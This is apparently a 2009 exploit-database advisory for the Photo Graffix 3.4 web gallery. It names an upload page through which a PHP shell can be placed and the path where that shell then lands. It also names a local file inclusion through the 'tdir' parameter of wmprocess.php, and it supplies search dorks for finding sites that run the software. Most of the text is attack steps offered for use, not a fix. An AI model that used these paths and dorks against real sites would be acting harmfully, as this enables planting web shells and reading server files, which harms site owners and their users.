[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Photo Graffix 3.4 Multiple Remote Vulnerabilities
# Published : 2009-04-08
# Author : ahmadbady
# Previous Title : Joomla Component Cmimarketplace (viewit) Directory Traversal Vuln
# Next Title : Xplode CMS (wrap_script) Remote SQL Injection Vulnerability


=-=-shell upload/local file-=-=

-=-=-=-=-=-=-=-=-=-=
script::Photo-GraffixV3.4.zip

Author: ahmadbady

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
download from:http://www.photo-graffix.com/V3/Photo-GraffixV3.4.zip

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
upload:
/path/mp3upload.htm ===> shell upload

shell = /path/music/shell.php
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
xpl:
/path/wmprocess.php?tdir=[open local file]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
dork: "powered by Photo-Graffix Flash Image Gallery"
  "powered by Photo-Graffix"
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# www.Syue.com [2009-04-08]